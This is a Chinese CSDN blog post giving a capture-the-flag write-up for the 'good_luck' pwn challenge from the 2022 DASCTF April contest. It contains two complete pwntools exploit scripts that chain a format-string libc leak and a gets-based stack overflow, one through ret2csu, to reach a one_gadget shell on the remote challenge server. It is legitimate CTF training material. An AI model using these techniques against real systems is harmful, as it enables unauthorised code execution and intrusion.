2022DASCTF Apr X FATE 防疫挑战赛 good_luck

已于 2022-05-10 11:50:58 修改
阅读量781 收藏
点赞数 1
分类专栏: pwn 文章标签: 安全
于 2022-04-24 19:03:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/124389444
版权

这道题最开始的附件,代码是随机生成一个0~199的数,然后0触发格式化字符串漏洞,1触发栈溢出漏洞,修改后的附件随机数是0或者1

下面是脚本,脚本逻辑:通过栈溢出返回到格式化字符串漏洞函数,泄露libc地址,然后再返回到main函数,通过栈溢出执行onegadget

几率:第一次执行栈溢出1/2,第二次再次执行栈溢出1/2,1/4的概率执行成功

利用失败的思路,1、想通过ret2csu来执行puts函数泄露地址,2、通过pop_rdi来执行system函数,但是两个地址中都包含0a,由于输入函数是gets,遇到回车就截断了,所以利用失败了

from pwn import *
from LibcSearcher import *
context(log_level = "debug")

# p= process("./luck")
p = remote("39.99.242.16",10000)
p.recvuntil("good luck\n")

if b"luck!" in p.recvline():
    # gdb.attach(p)
    # pause()
    offset = 0x58
    payload = offset * b"a" + p64(0x400836) + p64(0x400923)
    p.sendline(payload)
    p.recvuntil("fmt\n")
    p.sendline("B"*8 + "%34$p")
    p.recvuntil("BBBBBBBB")
    libc_start_main = int(p.recv(14),16)
    print(hex(libc_start_main))
    libc=LibcSearcher('__libc_start_main_ret',libc_start_main)
    libc_addr=libc_start_main-libc.dump('__libc_start_main_ret')
    one_gadget = libc_addr + 0x45226
    
    p.recvuntil("good luck\n")

    sleep(3)
    if b"luck!" in p.recvline():
        offset = 0x58
        payload = offset * b"a" + p64(one_gadget)
        p.sendline(payload)
    else:
        pass

else:
    pass

p.interactive()

补:

第一种思路的绕过方法,在csu_front前面有一段跳转代码,地址中不包含0x0a,这段代码就是检查rbp是否为0,如果为0就跳到csu_end代码,如果直接rbp不为0返回的话,会执行到csu_front代码 ——思路来源:Cat_CatF1y师傅

利用步骤大概就是利用溢出使得rbp为0,然后让程序返回到这里,此时rbp为0就可以跳到csu_end调整对应参数,此时rbx=0,rbp=1,然后还是返回到这里,由于此时rbp为1,所以会执行到csu_front代码,就能够成功利用

几率:由于这里只需要一次栈溢出,所以成功率1/2

from pwn import *
from LibcSearcher import *
context(log_level = "debug")

p = remote("39.99.242.16",10000)
#p = process("./luck")
elf = ELF('./luck')

p.recvuntil("good luck\n")

bss_addr = elf.bss() + 0x870
pop_rdi  = 0x0000000000400a23
puts_got = elf.got['puts']

if b"luck!" in p.recvline():
    #gdb.attach(p)
    #pause()

    offset = 0x50
    payload = offset * b"a" + p64(0) + p64(0x4009F1) + p64(0) + p64(0) + p64(1) + p64(puts_got) + p64(puts_got) + p64(puts_got) + p64(puts_got) + p64(0x4009F1) + \
        p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0) + p64(0x400876)
    p.sendline(payload)

    puts_real = u64(p.recv(6).ljust(8,b'\x00'))
    print(hex(puts_real))
    libc=LibcSearcher('puts',puts_real)
    libc_addr=puts_real-libc.dump('puts')
    binsh=libc_addr+libc.dump('str_bin_sh')
    system=libc_addr+libc.dump('system')
    one_gadget = libc_addr + 0x45226
    payload = offset * b"a" + p64(0) + p64(one_gadget)
    p.sendline(payload)

    p.interactive()

0ne_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apr-1.7.0-apr_escape_test_char.h.zip
10-01
编译 apr 1.7.0 需要的头文件 apr_escape_test_char.h --------------------- /* this file is automatically generated by gen_test_char, do not edit. "make include/private/apr_escape_test_char.h" to regenerate. */ #define T_ESCAPE_SHELL_CMD (1) #define T_ESCAPE_PATH_SEGMENT (2) #define T_OS_ESCAPE_PATH (4) #define T_ESCAPE_ECHO (8) #define T_ESCAPE_URLENCODED (16) #define T_ESCAPE_XML (32) #define T_ESCAPE_LDAP_DN (64) #define T_ESCAPE_LDAP_FILTER (128)
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2391
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
安恒月赛2020年DASCTF——四月春季赛---Web-Writeup
SopRomeo的博客
04-29 3587
比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
DASCTF X CBCTF 2022九月挑战赛
shinygod的博客
10-19 635
找给 check.php 发包的那个部分。可以在开发者工具里全局搜索一下,发现是 sn 这个函数发的包,代码有点乱可以。在 sn 函数中看到了三个参数的设置。先看一下是在哪边调用的 sn ,然后一个一个的跟踪就行了。搜索 checkCode ,checkCode 由一串字符串和 salt 构成,而 tm 是时间戳,score 是分数,最后就可以构造 exp了。
ISCTF赛后总结
xiaf5的博客
10-24 2216
学了一个月的菜鸡,第一次打ctf比赛,感觉自己实在太菜了,总结总结经验。 Web 跟着队友混,队友Web贼强,Web全AK. CRYPTO 弯弯曲曲的路 不合格的pwn手竟然拿到密码题的一血。。。 题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。 打开下载的文件,文件名为zip格式提示用zip格式打开解压缩。 根据题目描述,应该是5组,每组5个 分组后仔细观察,发现flag是交叉式的。 ISCTF{Welc0nne_..
[MISC]2022DASCTF Apr X FATE 防疫挑战赛
RookieMOR的博客
05-06 838
1.SimpleFlow; 2.熟悉的猫; 3.冰墩墩; 1.SimpleFlow: 下载得到SimpleFlow的压缩包,解压得到SimpleFlow.pcapng,流量分析题目。查找 flag. ,可以知道一共有四个flag.txt文件,一个flag.zip文件。用kali的foremost指令可以分离出flag.zip文件,发现flag.zip需要密码。 再追踪每个flag.txt。 发现蚁剑流量,一个一个base64解码, 在其中一个txt文件中得到: Y2QgIi9Vc2Vy.
2022DASCTF Apr X FATE 防疫挑战赛复现
m0_62129839的博客
05-22 403
misc 第二题: wireshark打开直接搜字符串flag,发现4个字段含有flag,其中一个发现是zip文件,想把它提取出来, 将他数据导入一个新的zip文件,打开 在50段找到密码加密字段,找好格式用base64解码,得到密码,解开得到flagPaSsZiPWorD 第三题熟悉的猫: 被卡住了,下载好了keepass,可是解码工具却一直下不好,下好了也用不上。暂时搁置。 ...
house of cat 学习
m0_51251108的博客
10-13 1093
house of cat的利用链学习
2022DASCTF Apr X FATE 防疫挑战赛 部分web复现
errorr0
04-28 1640
DAS的部分web复现
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3338
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
apr_mcast.rar_apr_apr_
09-21
Apr组播小程序:Apr下实现组播发送与接收的功能!
APR2007_d3dx10_33_x64
10-11
APR2007_d3dx10_33_x64
Apr2006_d3dx9_30_x64
10-11
Apr2006_d3dx9_30_x64
apr.tar.gz_apache apr _apr_apr aprutil .tar_apr t_run
09-21
APR(Apache portable Run-time libraries,Apache可移植运行库)的目的如其名称一样,主要为上层的应用程序提供一个可以跨越多操作系统平台使用的底层支持接口库。在早期的Apache版本中,应用程序本身必须能够处理...
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 62
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 798
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
严把质量关,饮片追溯系统应用,信息化追溯助力用药安全-亿发
YIFARJ的博客
04-26 115
随着国家政策的持续推动和各地的积极响应,相信中药饮片追溯系统将在未来发挥更加重要的作用,有助于中药饮片行业提升质量水平,净化市场环境,增强消费者对中药饮片的信任度,促进中医药产业的健康发展和可持续性增长。追溯体系可以追踪和记录药材的种植、采集、加工等全过程信息,为质量监管提供数据支持,有效防止低质量或假冒伪劣药材进入市场,保障中药饮片的品质。通过建立追溯体系,消费者可以查询药材的来源、加工过程和质量检测等关键信息,选择可靠的中药产品,提高用药安全性,避免因药材质量问题导致的用药风险。
五一节前的信息系统的安全保障工作
04-26 459
五一将近,为了能安心度假,节前做好安全保障室非常有必要的。 保障流程可以全面、有效地保障网络信息系统的安全性,提高系统的可靠性和稳定性。同时,还需要加强安全管理,完善内部控制机制,提高人员的安全意识和技能水平,以更好地保障网络信息系统的安全性。 保障内容确保通过对网络信息系统的安全保障检查,可以有效地提高系统的安全性,防范潜在的安全威胁和风险。 在执行关闭网络信息系统的流程时,需要确保操作人员具备相关的技能和经验,以及对系统关闭过程中可能出现的问题有充分的准备和应对措施。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 125
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
apr_thread_create: unable to create worker thread
05-18
如果操作系统没有足够的资源来分配给这个线程,那么就会出现apr_thread_create: unable to create worker thread 的错误。 解决这个问题的方法包括: 1. 增加操作系统资源:如果你的程序需要创建大量的线程,那么...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值